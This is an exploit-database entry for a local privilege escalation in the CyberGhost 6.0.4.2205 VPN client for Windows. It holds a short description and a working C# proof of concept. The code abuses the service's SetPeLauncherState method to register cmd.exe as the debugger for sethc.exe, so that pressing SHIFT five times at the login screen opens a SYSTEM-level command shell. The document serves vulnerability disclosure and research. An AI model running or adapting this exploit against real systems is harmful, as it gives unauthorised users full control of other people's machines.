CyberGhost 6.0.4.2205 - Local Privilege Escalation

Author: Kacper Szurek
type: local
platform: windows
port: 
date_added: 2017-03-06  
date_updated: 2017-03-06  
verified: 0  
codes:   
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 41538.cs  

# Exploit CyberGhost 6.0.4.2205 Privilege Escalation
# Date: 06.03.2017
# Software Link: http://www.cyberghostvpn.com/
# Exploit Author: Kacper Szurek
# Contact: https://twitter.com/KacperSzurek
# Website: https://security.szurek.pl/
# Category: local

1. Description

`CG6Service` service has method `SetPeLauncherState` which allows launch the debugger automatically for every process we want.

https://security.szurek.pl/cyberghost-6042205-privilege-escalation.html

2. Proof of Concept

using System;
using CyberGhost.Communication;

namespace cyber
{
    class Program
    {
        static void Main(string[] args)
        {
            Console.WriteLine("CyberGhost 6.0.4.2205 Privilege Escalation");
            Console.WriteLine("by Kacper Szurek");
            Console.WriteLine("http://security.szurek.pl/");
            Console.WriteLine("https://twitter.com/KacperSzurek");
            PeLauncherOptions options = new PeLauncherOptions();
            options.ExecuteableName = "sethc.exe";
            options.PeLauncherExecuteable = @"c:\Windows\System32\cmd.exe";
            EventSender CyberGhostCom = CyberGhostCom = new EventSender("CyherGhostPipe");
            CyberGhostCom.SetPeLauncherState(options, PeLauncherOperation.Add);
            Console.WriteLine("Now logout and then press SHIFT key 5 times");
        }
    }
}